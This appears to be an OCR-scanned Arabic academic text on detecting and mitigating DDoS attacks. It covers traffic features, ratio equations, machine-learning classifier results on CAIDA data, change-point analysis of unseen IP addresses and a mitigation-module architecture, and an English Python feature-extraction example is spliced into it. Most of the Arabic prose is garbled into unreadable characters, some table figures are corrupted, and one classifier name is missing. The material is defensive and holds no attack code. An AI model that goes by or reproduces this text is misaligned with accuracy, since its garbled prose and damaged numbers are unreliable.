J 6^31 j (j ^ - ^jLl^.VI (J^axJ J <J-<^ (j^ cl£^ a< V'*^ J Aj^IxJI JJJ-<Ji .oiLuoll JJ^Jl 4-^^>^> -JaLftJ) (J^A? ^-^^^ 

^a Jll "flash events" cfi^ cjI^U ^^.^ La ^>a^ ^ Jll<JI cJ^f^ ^Jc- 'J-^Aj ^ j ."^LuJI" ^ jLJ3 CjljJjj^ (jj£lui tl&^&Ua 
C5 lxi3l ^jjj^ill laaa (jjjJ AjI 4qjq^ ^^ic c <K ^ ^alili ttilli C5 lc S j . jj^Jl ^j^J ('^J^ ^J^) j <j^lLi Cjlclalil 

."jj^J! cil jU!" ^ jU! 11a 

"Recording and/or measurement of certain parameters of interest" c^li CjUIx^ ^Ua jl/j 

"Data analysis" lSJ^ 

jj^<J! ialLajj jl ^Lnli jJ Ai^^U! ^ J aJLu^^U J^^j) ^1 ^A Ja Ja^. jl c^^i ^ jLoill t iLlL^aJ <J j^. jl jail ^ 1> ^ 

"Parameters of Interest and Approaches Used" ^ ^VnnAtt g^llj S^lill cjUkAJI 

a£j^. ^jc j^xlll ^jj Ui *^lc .(egress ^^>*^ j) ^f*^ jj^>^^ ^j^- j ^ingress 

."Wte (or 63;^) /second" / (^jW j') "packets/second" j j^IVh^X ^(jj^JI jl) 

'"source/destination IP addresses" IP oJj^ /j^^Jl ojj^ <JH*1I ^ ^^aVI cjli J^ljJI Jxu^ij 

^ ji^ cjL-I^I ^ j^j^l 4iL^VU .(ICMP j UDP 'TCP ^> J*) J>j^ jj^l ^j^j ojj 1 ^ 

4^^)^. ^■ft.t.tiJ ^_5^1j aL^Q ^>!ai3l (TCP/IP) J J^J^ J ci Jud ^ Ju ^J l)> 4-^^ 

p >JI o* uj^ J . Jliall t ^ "traffic-flows" ciiisjll a£ jla ^UJI lj* ."traffic-flows" ^Ua^l 

^jt jjc (IP) (J J^J^>^^ dilaa ^^>^- (ja> ^ '^^-^^ 6 ^A .TCP jfi*** Jc 4_Lil^ JU^jI ^ ■ ala ^jJaJ 

CjUjaj ^a-> J I ^dlia .CjUI > >ijq^l CjU^A Jl£juj) c qVi^ ^ ^jc. c Lia£H CjljVqM L5 -^-La ^a^i .(JJJ^I J Jj^ ^ '2006 J 

."activity profiling" ^Ailt LiaHI I 
."Sequential change-point detection" mIuAujI ^ I jjiU) ^Lij t_Li£ - 
."wavelet-based signal analysis" cjUjj^I - 

(JjlaJ ^ ^>fi*j CjU»UuaV1 l^^c jjjj l^ili ttilli m Cj& jll tilli a -\V\ A\ cAjl&£1 <aiaLa Sjaj ^ jjuj J!L<»j V (JjtiLalt 

<Jjou31j o^jlill ^j^^xi ^JJjlLo ^ l^ilj IjAiLujI ^ulUll ^Ja» a q\ 4^A^)Jaj 6(JjjLujV1 J .(J 7- all I^A J ^^^-^^ lS-**^ 

<C5 lliaJI ^llxJl J Cjl^jJall ClAiiJ J ^ ^cjtnl) jV ^JjVI Cjl£jJa3l ^l^xJ 

"Detection Performance" f >At 0^ ^£11 
.Kline et al h-? ^ ^ tJUJI .<JL^11 !1a J j JaLuij c!3Ua jl£ ^Car/ ^ a/ ^aI j^' 

~ <jc c fljua^lj J-^c (J^ Jjijj J AjjaLijjll lIjU^jII ^ 1^.1 j ^jl j Ia j£i ^akj ^I^VI Jc jj^jlill 

ta 6^1 jA ^Ij j i^j^l* l^^a ^a djlcjjuJ! 6^a "wire speed" ^-c-j^ cr^^ ^ ajjoLoiVI JLujjVI JojI jj ^ 
<c jjoij (JaxJI ^^ic Ull^. 6j^lS jj£j jl ( ; ^ j l ftju^ll daULao <jaia\_L<JI ^Ic. Sj^lS jj£j ^^Ij j?* jl j^ill ^ lIjIIluo^jII JjS j>* 

jJjLj CAllJj jj jjUx^ll Sj^-aJ '^jl J-^l 4_^Jlx-<Jlj <^-*-H pbVI I^A Jg-Ia Ja^Jl jj^aJ -^5^' UJ-^ U' cJ 1 '(J^VI ^^ic GbpSlO 

j* l_jjj£j <c jjoij L^-La ujj dab ^LoJIj a j^_^VI a^A (JIa < a *XU S jj !-n a CIA-Aac. ^jq'n j aj a - ^ 4 ^ a i— iIxj^ 4 ?n n^cJI dLis^^Jl 

'AMCC np7510 'Intel IXP2400 Jk) J^ ( ^ 1>^j>^ ^ jj^J j SJ^Vl c> ^jM^ ^ 

^jljSll <cil3i AiUbVU .(Routing Switch Processor j Agere Fast Pattern Processor j EZchip NP-1 

.lJ^JI JjLli] field-programmable gate arrays (FPGAs) *bVl 

e-hVI aJ^c cjLaJlxx dUjl£^j Liiixlajl ^jII j .Shanbhag and Wolf j^ j ^ j-^ll 4-^jjl j=* ^ahvimV Jjaj tilUA 

lgjL.La.aJ ^aJ j* j ^flaJ jA 4_Lajjl jk <j£ j* £^-ill (jli t^Uaill liA (JJa , jl jla cJ^-^ ^ j^juJI jC- L_Lu£3l diU^jjl jk j* AjAxJI (Jjt-JuI 

<J^j j-a e-taVI j-a j^S ^ > sib] (jj^aJ ^cLaii ^^jII j jjj-all ^j^> ^ 3L3> ^ Wq^l ditaLjll <JiLa i-ijmj jjjULg jl£ j^ ^ 

fC jiaJJ ^^Ij CjULjajill Cl >1 ^a^-j JbJl <JAsla3I jc t flJu£l] c£ J^^l L_u3LaiVI (J^asu tilU^a ;L_bujl_L<Jl CjS jll t *q.*<U L_fl^J! ^jjj^J 

liA ^ jjjall ^> u^j^ tl^j^la ^> ^ jll ^ jaJl (payload) l^j^j header il t> lA^^ J^- 

header l£ lSJ^ ^c^lli ^ ^Ujj .^jI^JIj c^jll ^ 4iK* ^ ^>JI CjUjI^j "packet header" ^>J> l>-jjj 

.CjUL gajaS) f J?^ <J^^ JAslaII J^lk JJoflll A-Ani <Jaij jj^alll 4JlaJl tdilaUlkl Luijj jl C5 lc ftj^SlI I^jJ ^ J£ ^5 jSa o j 

ttilli AiLjaVU ,<-ftjaJ! ^ jjj jll IP <jjjU^ j j.i^a.* <LLouj U^jjIj ^-jj^j header ^ Jj^" ^^Vu ^UuaVI ^ 
header TCP ^^jt> jSa^ll ^ ^ jku "low-level packet analysis' u *^ v ^ ^ ^^^^ 

cjUJI^ j ((FPGA) ^ H ^I^Vl ^ Sj^Vl jj^ jk Ai ^L, ."transport layer' 

.^j^ Jil "application-lever £ A1aAsZ1 \ ^JL** J^kj ^^Ic S j^£3! tilli ^ Loj t^j^Jl ^Jn&i ^1 j^V jVI 

^ jljSl! j!^Ulaj| s j^ll Liajl jVl ^3Ua .application-aware firewalls ^ ^ *^ 6 ^ ^ J^ 3 jW^^ l$J±^\ 
JU^jI jUj l) ju ^ ju ^ cJjkj (j-<»j ^j^js (JL^aul Cjlia^j ^^>^- CP- CjI^JUlx Jj^llxJI 

jj jjj^ll jl <J^^)i3l a£jjoJ1 J j S^C-Lolaj iAaJ q\ (j^-dJ ^ j^^ll iaLudil ^^-^^ ^AaJlll 6L_fl J^lall (J^ 3 *^ ^ <il ^jJal jll j-<i 

djlc ja*\ a\ (J jVI ^alL<Jl ^Luaill A^VI ^Ij^l ^ iillil J .^J^ C5^^ ^J^l JJ^ -^L^ AilxIxJl diUi jIscaII JjUjI 

dIa JiLd jjou J-dlc jA j ttLLuj jA La£ cojjikl <Jaij /o^li^j l^j^jii jl egressj ingress ^ j^ *^j^ ^f^JI 

6^^.VI jfll jj jaJl j e-bV! (^^Jc ULoj jijJ uiij) ji^ill jl j-d li j^. til^LojVI <c jjaij ^^.t.tij Uua <J>ulI! ^jj^S jj^UII 

ui^l d^A j^ c Liaall ^ ^LilA 6 jixk ^ <C jjoJI Aj jl jIaII <^JU-a3I 

"Decision-Making and Mitigation" UjlST <> c SjiAM tj jljill j-l^a 

kb aS ^jI jSII .^b jjoJI <xjU1I/" binary whitelist" *\ > ^jjti ^Ull (jJ-J ^j^il JaU^II jt J jjSII jlja iUJl j£dj 
real-time black-hole lists ^source or destination-based access control lists 'J^l <Jl^VI j^ A^jlLi a^^a^ 

Jjajuj t^U^jUJI cil jSaVI j* (<j (jj5 j^l) ^jI jilt i>i& j^ CjU jIslJI (j^LkU j£<»j ttilli ^1 AiLjaVljj .DNS black lists j 
jjj .k>j3t 11a .CBL ( http://cbl.abuseat.org ) j Spamhaus XBL ( http ://www.spamhaus.org/xbl ) « Jl^ll 

, jljill 4_iLaC j-d W lA jUjcU 4 J*^J ^-^jVI j^i^llj ^ajl j^ll &.AA ^I^JjujIj ^Ludjj ^IjJ A Lal£]| ^aaAlLJl 

^aJj ja^A I^J ^j^aj 4jjlla-<Jl c qjq^Ml 4 j^jll jloal Aiili j ^ > ^il jVI dj|^)±aJl j jl^VI j-« <C ja-\ a dij^Ja ^IjVI <J ^li. 

A^Lai jxi AaJl jA c Liaal) ^Li^jjIjIojI Jj^-« jl t^jljld j^J ^^ic Sjjiala Cllaaj^a) 6^A Ajcli^ll diUlVI Whilst c Aju^JI 

Ldl jj^J ^ ja» CjIjUj jl 4_pji3l IP ^a ja. ( ■ lUaJJ HAj tDjjjjJalb . j^A^ CllSj ^JjujI ^ l^JS ^aJllI j^J CjUjIoia ^1 JjJ^H ^ja» 
^aJJ ^a jaJl ^1 jljill ilaJl jxi ^aja^U CllS jll ^ (djIjLiillj) ^a jaJt <^JIxa ^ ^A <lal^ll <Jj»j^a3l .lA ja.lj jl I^JaL^J ^aJJ jl 

. jljill I^A iLaJl ^aJJ jjlj tAilcl jj^ JAJ ^^jll jaJl L$\j 'l^J ^IajoJI ^aJJ ^ jaJl ig\ 
random early detection ^->W* jj j^j^ ^ ' cft^M <-W^ ^ .aS^i ^U^ jl s jbV g-I^l cjSjII jSuJI J**]I j 
jl** cUj TCP ? > ^ ^UL-^VI jjii ^1 j (FRED) fair random early detection j (RED) 



a^^1\ cjUaA ^ uLi£U Machine-Learning Algorithms ^L** jJ 

^xujjj cjUjii j djUxijjl ja. jjjJajj ^Loj^aij ^ Ukj^a Vl *l£ilt ^ jjs (machine learning) ^Vl ^Ixiill 

cilUA r lc ."^1" cil^U 

.Ajjiulj ^jjUjkJIj ^L^VIj (data mining) 

^j^j] <!Ui ^iLftj l^l^klujl ^jSaj ^1 j Ajalill j <aJU^a3l "Subset of features" ^j^t (.> ^ ^ j^^^ -1 

.c-L ui Sll ^uLc; ^ du^kloal ^1 j "Machine-Learning" ^Vl ^aLu djluii c alik^ AJUi ^j^jj -2 
"attributes" ^jI^JI ^Ij^I ^ c5j^ c^^j "process of feature reduction" ^ ^ J£U^ ^JixJ <j^3b 

<JVl ^jIxj djli&i Jl*) "modelling technique" cjli&i (j^Saj Jja <L^a3l djlij k±*&\ J£)I\ "feature" ^ 

L^jiill c_jjlk<JI Cjajll ("statistical techniques" ajjU^VI ^jJUVi ^jU^j "Machine-Learning" 

^^klauJI ^ ftj^ll dAi5L&.VI o& a^JcA\ a£j^> CsP^ cJ^ikVI sai^ £±*J£\ ^ "node" 

tilliA ^jl t(_^^>a.! 4_S£juL<i A^Jjuj (^^-Sc «4_ix_nJa» A^^)^ cJ^julj Lq L-Jxj ^11 (J- (JS ^jj^ 

jjja ^^IslSI <i! jLaJI ^jc ^ j^^ll t il j£ jLoj clA^ ; ** 1 J^ J a£jjoJI CjU£ jLoj A-aA^j A-iA^VI j-<il a£jjoJI A^^aJ aL^II dili j 
(j-a A-Ujaij 4_ijLdj jUlklj I "^lm ^ al" ujj^-^ J 'cJ^^^ cJ^f^ . t — J ^ *\\ Jjs ^ aJ£jouJ1 AjojIj^ duj j 

^jc L_fljai£3l (jjaaJii AJlxill A^jjaJI ^ajL^a. ij laiL I jA£ "Zargar et al" uj^)^j j^j j .a£jjoJI (3^^ AJSim* uj^ L - J ^ 
. JlaVl Sj^ll A^^^ ^j^i3 (PCA) "Principal Component Analysis" gr^J^ uj^^ cJJ^ ^l^ki^U cillij ^ja^JI 
(jc t smi^H ^jjIjjII j-<^ ^ j^l j (Jjjj^ CjI its c &jujSJ ^AxlxJI ialiijVl cJJ^i c5jj^ Aju^IIaj I jA£ "Jin et al" ujj^ j u^- 

^•LaJ I jiiil .(jjliill (JjlaJ j-aj U£ TCP u^U ls* flag-bit lS^ I jIaxIujI .cjULjajjill ci iLa^a 

^1 ^a.jj V Ail j& j Uu^j Iajs a] l_j jLojVI (jli ttilli ^ j .SYN flooding ^ c Lj^ll A^jiiLJI <Ljia3l ^l^klojl 

_<aja£L<i Ai^ £A (J^J^ ^ cJ^^ 1 ^ c ftju^ Ajfll^ jl AaJU^ djl jjLd flag AjjoJI ^jL ^jUuia 

Aa. L^tijj duj i (machine learning) c^^^ ^ 6 u j>^^ ^ 'u^ j .l^j^ f ^ 

tUlla. t^lxjll ^ ALjia ^Ulbj ALjia SjJfl ( . lllaJJ tCjUjfljll oi^ ^jSl j .DDoS i— (jc c Ljo^ll ^ A^^ll ^ A^^ 

us 

Paruchuri et " uj^)^^ J l^jj^j^ .lh c &ju^ ^ j^^l Ailj£ ^l.^luiV a^j^a. ajjILj Uiajl I ja-jlial j ,cijL<i jl*-<J! c Luj£ 4jljuj 
A^ja. J£ diia. ^TTL-based PPM scheme ^U^j Probabilistic Packet Marking (PPM) ^j^^ "al 

(jj^kl j ^jjjaJ m ^ jy&W jA*s*a ^nVil A-iauJal! j^u^d Ai^x-d ^jjj Uui tA^^aJl Aiajoal Cj ^^jll AiLauJl £a LluAc L-Lail nj <jLuaJ 

.K-NN Classifier aIjj^ ^l^ki^lj ^ j& < LSSM cillij cjU^a AailU I jlLJ jjj^l ^IS "Nguyen et al." 
j .u^j^ f lWj-* cJ^ ^ a£jJo3I <!L^. c Lii^ajl k-nearest neighbour ^^A 3 1 j^^^l ^-j) 

g\ j^IojV ^ j^i djlLfki ^ JUJl jA U£ (Jjjj^ *n ^ 4 ^ uiK I I ^ "computational intensity" 4jA**aJI <K jli ^LLLuj 

.SjjU^l! CjULJl ^cl j3 (Jjl^J ^aJJ Cilia CjUUJI 

^ 14 ^Ic- c5 ^-c- ^ <^a j .KDD dataset u^j^ ^ q>*^1 cjLuSj ^bl ^jj^jI 'La^vim^l aj-ulujII ^jjILJI .1^.1 

.Smart and Secure Environment (SSE) ^ public-domain CAIDA dataset 

B cjLa^J! d^a cJ^U. l^-^-c- j^c. cJ^joij jjj - *^ ^^>^ cjUAlaIIj V DDoS C-^U^a ^ ^ alia a ^! jj! <LujIjj c_ lqj 

djl ^^c> (j£-<»j ^^jII j chi-square > ^-s^*-^^ cJ^-^- el) -0 ^ L - J ^ 6 ^ ■ L - J ^ 23 ^ 

'Naive Bayesian 'K-NN 'SVM <W! CjI^ jji ^I^L.U "classifier" * Vn^i^ t *ti>j ^ 

t> SjIilJI a^j^JI pbV Uiiij j^I ^> 6 1a .Fuzzy c-means clusteringj K-means 'Decision Tree 

Receiver Operating Characteristic (ROC) yr* jj'j^j .DDoS ^ < ^ ^IxjII 3JI CjU^ Jjlja. 

^Ljajj ^ Fuzzy c-means clustering ^ ^" . n^ l c-jJLojVI < atLk^ ^ ^aj Ja»JI 11a ^> .F-measurej 

"Feature Selection and Evaluation" f^^Jtj SjULLaJI cjIjj^JI 

1. One-Way Connection Density (OWCD) 

2. Average length of IP flow 

3. The ratio between incoming and outgoing packets 

4. Entropy of IP flow length 

5. Entropy of the packet ratios of the three protocols TCP, UDP and ICMP 

6. Ratio of TCP protocol 

7. Ratio of UDP protocol 

8. Ratio of ICMP protocol 

9. Number of data bytes from source to destination 

10. Number of data bytes from destination to source 

11. Number of packets in which destination port is mapped to a particular service 

12. Type of the protocol, e.g. TCP, UDP, ICMP 

13. The number of packets having the same source IP address and destination IP address 

14. Number of wrong fragments 

15. Number of connections that have SYN errors 

16. Number of connections to the same source IP 

17. Number of connections having the same destination host 

18. Number of packets where URG flag is set 

19. Number of packets where SYN flag is set 

20. Number of packets where FIN flag is set 

21. Number of packets where ACK flag is set 

22. Number of packets where PSH flag is set 

23. Number of packets where RST flag is set 

4-uIa ^jSli^ 
jL^ikl chi-square M^-^jj "gain information" <_D^. i> cjI J^ll mjjj 2 f ^ U3a L£j 

(a) One-Way Connection Density (OWCD):

    OWCD = \frac{\sum \text{OWC packets}}{\sum \text{IP packets}} \times 100 \qquad (51)

(b) Average Length of IP Flow (Lave flow): 

^^iii ^pJI c ^ixj Length of IP flow ^ .{^^J^jj^h ^ IP u^j^ < j^^Jl ^ < jAj^iJI ip Cj\j^) 

IP flow c^! 

    L_{ave\,flow} = \frac{\sum \text{IP packets}}{\sum \text{IP flows}} \qquad (52)

(c) Incoming and Outgoing Ratio of IP packets (Rio): 

    R_{io} = \frac{\sum \text{incoming IP packets}}{\sum \text{outgoing IP packets}} \qquad (53)



(d) Ratio of TCP Protocol (Rt):

    R_t = \frac{\sum \text{TCP packets}}{\sum \text{IP packets}} \qquad (54)



(e) Ratio of UDP Protocol (Ru): 



    R_u = \frac{\sum \text{UDP packets}}{\sum \text{IP packets}} \qquad (55)

(f) Ratio of ICMP Protocol (Ri):

    R_i = \frac{\sum \text{ICMP packets}}{\sum \text{IP packets}} \qquad (56)

(g) Land: The number of packets having the same source IP address and destination IP address. 

(h) Protocol-type: Type of the Protocol, e.g. TCP, UDP, ICMP, etc. 

    z = \frac{x - \bar{x}}{\sigma}



cjUUJI ia^ji^ i (value of each feature) Sja* y^J^ yr^' c^- ^ oj 'x <x cjUIx^I 

"(standard deviation) l$Ji*^\ lJIj^jVIj (mean of the sample dataset) 
tji* J£ ajjj ^Ual information gainj chi-square A^L^j (j^ki ^ t^lli ^iL^yu 
tc_jjUall ^ j^JI ^U?J ^W^^ -^^^ c> ^W^l ^ c> oiA j-l j^IujI ^ j^l S jJaaJI 

^ machine-learning s^j^ yr* SjkaJI .sampling frequency of 1 s ^ 
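The features (a)-(h) and equations (51)-(56) above, together with the z-score normalisation and the 1 s sampling interval, as an added worked example (this is not the authors' code or the KNIME workflow the text refers to). Packets are grouped into 1 s intervals, each interval yields the feature vector, and the vectors are normalised across intervals. The capture, the monitored prefix 10.0.0.0/24 and the flow definition (src, dst, protocol) are constructed assumptions; the one-way-connection count treats a flow as one-way when its reverse direction never appears in the interval.

```python
"""Per-interval feature extraction for DDoS detection (added example; constructed traffic)."""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import Dict, List

# Hypothetical monitored network: packets whose destination is inside it count as "incoming".
LOCAL_PREFIX = "10.0.0."


@dataclass(frozen=True)
class Packet:
    ts: float    # capture time in seconds
    src: str     # source IP address
    dst: str     # destination IP address
    proto: str   # "TCP", "UDP" or "ICMP"


def entropy(counts: List[int]) -> float:
    """Shannon entropy in bits of a count distribution (0 for empty or single-mass input)."""
    total = sum(counts)
    if total == 0:
        return 0.0
    return -sum((c / total) * math.log2(c / total) for c in counts if c)


def split_windows(packets: List[Packet], width: float = 1.0) -> Dict[int, List[Packet]]:
    """Group packets into sampling intervals of `width` seconds (the page samples at 1 s)."""
    windows: Dict[int, List[Packet]] = defaultdict(list)
    for p in packets:
        windows[math.floor(p.ts / width)].append(p)
    return dict(windows)


def window_features(packets: List[Packet]) -> Dict[str, float]:
    """Features (51)-(56) plus the two entropies for one interval.

    A flow is (src, dst, proto); a one-way connection (OWC) is a flow whose reverse
    direction never shows up in the same interval."""
    n = len(packets)
    if n == 0:
        raise ValueError("empty interval")
    flows: Dict[tuple, int] = defaultdict(int)
    for p in packets:
        flows[(p.src, p.dst, p.proto)] += 1
    owc_packets = sum(c for (s, d, pr), c in flows.items() if (d, s, pr) not in flows)
    incoming = sum(1 for p in packets if p.dst.startswith(LOCAL_PREFIX))
    outgoing = n - incoming
    proto = Counter(p.proto for p in packets)
    return {
        "OWCD": 100.0 * owc_packets / n,                # (51)
        "L_ave_flow": n / len(flows),                   # (52)
        "R_io": incoming / max(outgoing, 1),            # (53); a flood may leave no replies at all
        "R_t": proto["TCP"] / n,                        # (54)
        "R_u": proto["UDP"] / n,                        # (55)
        "R_i": proto["ICMP"] / n,                       # (56)
        "H_flow_len": entropy(list(flows.values())),    # entropy of the packets-per-flow distribution
        "H_proto": entropy([proto["TCP"], proto["UDP"], proto["ICMP"]]),
    }


def zscore_normalize(rows: List[Dict[str, float]]) -> List[Dict[str, float]]:
    """z = (x - x_bar) / sigma per feature over the sampled intervals; a constant feature maps to 0."""
    keys = list(rows[0].keys())
    stats = {}
    for k in keys:
        vals = [r[k] for r in rows]
        stats[k] = (mean(vals), pstdev(vals))
    return [{k: ((r[k] - stats[k][0]) / stats[k][1] if stats[k][1] else 0.0) for k in keys}
            for r in rows]


def sample_traffic() -> List[Packet]:
    """Constructed capture: second 0 is ordinary two-way traffic, second 1 is a SYN-style
    flood from 40 distinct sources that never receive a reply."""
    pkts: List[Packet] = []
    for i in range(3):
        pkts.append(Packet(0.1 * i, "203.0.113.7", "10.0.0.5", "TCP"))
        pkts.append(Packet(0.1 * i + 0.05, "10.0.0.5", "203.0.113.7", "TCP"))
    for i in range(2):
        pkts.append(Packet(0.5 + 0.1 * i, "203.0.113.8", "10.0.0.5", "UDP"))
        pkts.append(Packet(0.55 + 0.1 * i, "10.0.0.5", "203.0.113.8", "UDP"))
    for i in range(40):
        pkts.append(Packet(1.0 + i / 50, f"198.51.100.{i + 1}", "10.0.0.5", "TCP"))
    return pkts


if __name__ == "__main__":
    rows = [window_features(w) for _, w in sorted(split_windows(sample_traffic()).items())]
    for raw, z in zip(rows, zscore_normalize(rows)):
        print({k: round(v, 3) for k, v in raw.items()}, {k: round(v, 2) for k, v in z.items()})
```

In the constructed capture the flood second scores OWCD 100, an average flow length of 1 packet and a very large incoming/outgoing ratio, while the calm second scores OWCD 0 and ratio 1; those are exactly the separations the classifiers in the tables below are trained to find.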
.machine-learning classifiers CjUi^ JjS ^1 ^> ajJ&Vi o>LJ ^ A^nL 

<lj ^IjS j^^aV^ KNIME cs^^ jjLd obi J ikUj aj^IxJ! ^j^-j ^ jrs^ t 'j' 1 ^" ^ .4^-*^ jjj*^' 

cs^' 4_pUll CAIDA J^^i J^ll J u^jj . https ://www.knime.or g -W jll i> 

.SSE ^ 



Samples collected

Network Data        Data type        Total number of packets
Trained             Attack (CAIDA)   9,45372
                    Normal           1J 0,535
Unseen test data    Attack (CAIDA)   3,24,098
                    Normal           36,485

Classification

Method used         classification %
Fuzzy c-means       98.7
Naive Bayesian      97.2
                    96.4
Decision tree       95.6
K-means             96.7

.f-measure J^>^ Jj^' 



F-Measure details

Method           TP    FP    TN    FN    F-measure
Fuzzy c-means    298   2     270   3     0.987
Naive Bayesian   290   10    256   17    0.972
KNN              280   20    243   30    0.969
SVM              282   18    253   20    0.964
K-means          285   15    273   0     0.9669
Decision tree    278   22    218   55    0.956



(jli 4l_jjL^j3I d^a ^jUj ^^ic .d^^xJI niachine-learning cjl_u£i3 ROC Lq ^l^kiujlj ^jUj j&^j cs-^-^ J^-^ 

.DDoS l-d^A L-flju^ll ^ ^jIjjJ! JjJaSl ^gjaau FCM (J^l 1 




[Figure: ROC curves of the machine-learning classifiers; x-axis: False Positive Rate; curves include Naive Bayesian]



DoS Detection Using Change Point Analysis (CPA) of Not Seen Previously (NSP) IP Addresses



I jk>j . Jj^I CjUI£3 ^jja ^j^j] CjU jlx^l j* TCP/IP jjc CjVL^jVI j* V ^ IP j^jUc 

4^jlauJI (j^ajL^iJ! ~ i J jjj ^^jII a£jjoJI ^^p* j^ jjj^l a ^ *j .DDoS 1 CjIa^aj (DoS) 4-^-^JI j-a j^^p^l 

."flash event" j ^2JI jjj* 

jj^J* -iaJ^)J IP J fQ ^ > *aJ ^aJ ^ j .TCP/IP L>^ 4^^l <flf2all ^ J j^Jl j dl3jl3Vl 4£jjui <J>ulI j£^<Jl ^)flsu IP <J 

s jj 3* o*^ u^-W^ ^ j .IP header fields o*\ j Jj^- ^i-<^JI/ ( ja^j3l j* ^1 jj^ cjI^jJ^I Jl 

IP jWM ^ ?&j*> i> pg'^^ j '("source address spoofing" ja^JI jljj& Ji«) IP header 

4il (jialjjal diL^gJl cJfLd jc c Luj£I] CjI^jVI j-a J£^^ ^ ^ 6 C5"^-^J J>(£^ cs-^J^ ^ aJLall l^A jl£ tLikjjtj jj^aLJl 

^xjjoij Uu3 <Jjoj j^JI ^jl j-a j-a Jc Sjr-Hmll Jc jjj^Uj I jj-a^ig-xJl tOjjlkVI A-l jVI J J m f J^^ll jAj> r-i<fl jl jJC L_flJJ jj ^aJJ 

j^ (Jjt^J Uui ^^CJjuJI ^a^JjauJl <il jLal ^JJJ j , jAj^xJI XP j^J^- ^—^j^ Jl ^H^J V £>i& j jJj^)31 ^jWqj 

lAjLudjj ^aJ ^j3I JJ^) - ^^ ^^)^ L^^)^^ ^ ^ o3 a ^-x»Jj g a11 1 <j^aLk]| JJ^)>Ji ^^)^J <£jjuoll JJ^>-<» ^^>^ (j^J jjj sill L_lstj^a3l 



(jc- aju^H AjjojLujI <1loj j£ CjI AilxIxJl- J,^> <~ia\\ JP ^jl jJC ^l^lull ^ CjI^jI 6 Alkali liA ^ .l^iLujj^l 

j& DDoS uL^a IP jl 
d^j^J! IP (JjjUc; J jj^aj Ja*^ ^ s^LaJI ft^bjll s-n^j ^bjj jl j^Ai 11a j .2 32 IP cl^j^ A-jjl , CjUUJI jJJ^J 

4-byte c> ^^^^ « i> uj^ 'MULTIOPS "G// awrf Poletto" j^j^j ^ jSI t^Jaall <^JUJ 

^ 1£ uj a .Peng et al. ci^^A 3 SjSlill ^UiLujI c > >i <Jaij ^_ilasu3 ^j^V c Sj ^ ^ jiiLJI <J^JI ^^ic jj^l .256-ary j 

2 32 ^ j^? * ls* j ^ L IP u^j^ c ' cl>^ "subnet" 4^^)^ ^ j ^ J djUi jlstxJI jj^j ^^la jc. I^JjUj oj^lill 
Jl ^jU^ ^ jjSI S&j m fj*l\ Uim^ ^^Jl ^AxJI j^ Ji£l JLiijI jl TCP J ^LaiK^^t J <£U Jio <^tull j^j^^ c> 
^jujU Luiaj) L_flj^)x-<JI) oj^lill ^UiLujI J^kj ciula JjIaJI .Peng et al. (j^o^ j v IP u^j^ c ' ^j^?*^ ^Luj) Jc a^. 
^JL dii^. 1 (IPv6) IP l>* J^JI J^JI J J^^-^l ^Jajc Jl jj jl j^j j^3 j UjLoj <K jll j (scalability 

.IPv4 jl 5^^Jax jxi jj£l jjjUxJl ^^C 
; L5 A DDoS jc c flJoSl] J ji^Jl J^J^ (JW^ J 4-iuUJ^)3l CAj laall jl dia tlLLoj ^jjja jj La£j 

a j^Jl jjI jxi c Laaall ^jjaJl CJ3 jll J 4jN nnVl J^*^ 

c^ij DMM SjUc cjUSI j^jL I j^li "Ahmed, E., G.Mohay, A. Tickle, and S. Bhatia" uj>ij ^ 



[Figure: A conceptual architecture of a DDoS Mitigation Module (DMM). Labels shown: Router, network firewall, monitoring devices, environment to be protected, device management interface, Control commands, Intrusion Detection System (IDS), Network Traffic, Applications Server, DDoS Mitigation Module, State information]



"DMM Architecture" DMM 4jjUu> 

£A j DDoS rt^ft ^ <<iJUjLaJl ^ jVl 6 J^aaJl L-IjujI CjS jll ^ j (JjJ j-<Jl ^a J>(S^ (jC L_Lu£3l (jli ttLLuJ JjJjoiI J 

(^Ic .4_pji3l CjU j£-<Jl ^A^- (S^- L>^ lI*^ (j- 0 ^UajJt 4-^-^ 4-lMl 6 jiaaJl ^jli ;^a J^g-!l AjI^J (jC d flju&3l all (jl ^J^-AJ ttilli 

lA jj^ <^5^ a^J^Vl ^a^l (j^J C5^*^ ^Iflajll a^Lk ^^ic (jjjJ J-<^ L_flJjJa-<Jl (J^nlaJ ^jJaJ tJtlxJl J^f^ 

jj^ ta^lc .(IPS) (jlj^VI £-1* ^-laJj "fire Wall" Cjl^Uiajltj AjjUJI (jljAaJl tjtlall cJ^J tJ>»Jjj £>i&j .^a J^g-!l (j-* (J^Uialll 

'"payload" ^ tiat-Lallj ta^jl jll IP (jjjUc (JjjLujI ^^ic j£j Ac I jail (j>» <c a a I lkl> J ; ^3^ (J^nJajll 4^<^ J^-^ 

CLjlinialill Aifla CliLaAk c V^*u>n a1 ja^. q?\ (jc- t a*XU <£jjj| ^3^" L>^ ^-*3^ 13^*^ lS^ 2 ^ (*J^ l£^J IPS .<illi Jl Lgj 

t^UJI UK J . jcIjSII <> qAJ Jaxj (HTTP payload J*) "application-layer services" 

(j^ _ jI^JjujU DjjlstlxJl CjIAjA^jII AliJ 4jL^1ujV1 (j-a &3&-^^ clA^ C5"^ ^Lfc^ C — J ^'^^ <C» jjJa j-all Acl jllI Cjlc a (jli 

,j]ai 1 oij) UJ^ ^ CS"^ 4_i1gVI 63^^^ 6 ^ 'M-*^ Pi ^ t^l^l/t—flJjJaxJl Jc ClAiLulajll 4-^-*^ ^uib.nVI 3^3^ (j^ 

(DIVIIVI) (J^J^ t fljiaJ ^-ujU ^J^*-*^ iAjlftVI ^a^Jjudj Ujli 6^)iaaJI (j* CjU j£-<JI <C j^^ aII ^jU^. <J^j 

.DDoS mitigation module J j^^l ^ j 

j C5 ]c. ^jlill "IPS" (Ji*-^ ^ ^Uaj jl JjnWlH AjIa^ 6^ j lAlA** a *^3^^^ JJO*^ ^J^' JJJ - ^' 

{"J "J a J^J^3^"^ ^^-^^ ^ C5^J^ ^ 'cJ^^^ J^^^ <jJa^x-<Jl 63^-^^^ J ^ajL D]VI]VI C-P 3 ^*^ 

^aJ (j-d j j/nti DIVIIVI ^cIjoiJ 6J^I .CjUiaA ^jC (jj^J (jl cJ^^Jj l!^^^ lS-<^^ *^3^ 'V ^f*^l (jl (j^- ^ 4-C- jJjouJI 

(JlxJI JaslaII ^yL^aia ^^aj Detection Approach ^jaill l_a jjojj .aaa^ ^ ^f^JI ^1 j^/^-iidVI &3^^ J^^^ c^-^- 

"Detection Approach" <-LiSl) 

